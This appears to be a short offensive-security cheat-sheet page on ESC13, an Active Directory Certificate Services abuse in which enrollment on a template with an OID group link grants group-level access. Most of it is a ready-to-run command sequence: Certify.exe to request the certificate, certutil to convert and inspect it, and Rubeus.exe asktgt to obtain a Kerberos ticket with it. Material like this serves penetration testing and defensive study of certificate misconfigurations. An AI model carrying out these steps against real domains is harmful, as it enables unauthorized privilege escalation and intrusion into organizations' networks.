Skip to main content

ESC13

If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.

Windows

request a certificate of the certificate template <template_name>

.\Certify.exe request /ca:<ca> /template:<template_name>

Save and convert the certificate

certutil -MergePFX .\esc13.pem .\esc13.pfx

Confirm the Client Authentication EKU and the ESC13OID issuance policy

certutil -Dump -v .\esc13.pfx

Authenticate (using the certificate)

.\Rubeus.exe asktgt /user:<user> /certificate:C:\esc13.pfx /nowrap